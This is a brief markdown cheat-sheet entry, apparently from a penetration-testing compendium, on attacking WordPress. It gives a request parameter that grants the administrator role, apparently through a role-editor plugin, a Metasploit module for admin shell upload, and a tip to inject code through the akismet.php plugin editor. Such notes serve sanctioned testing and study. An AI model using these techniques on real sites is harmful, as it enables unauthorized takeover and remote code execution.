killchain-compendium/Exploits/Web/Wordpress.md

488 B

Wordpress

ure_user_roles

&ure_other_roles=administrator

Shell Upload

  • Msfconsole
exploit/unix/webapp/wp_admin_shell_upload

Template & Plugin Editing

  • If template injection does not work, use plugin injection on akismet.php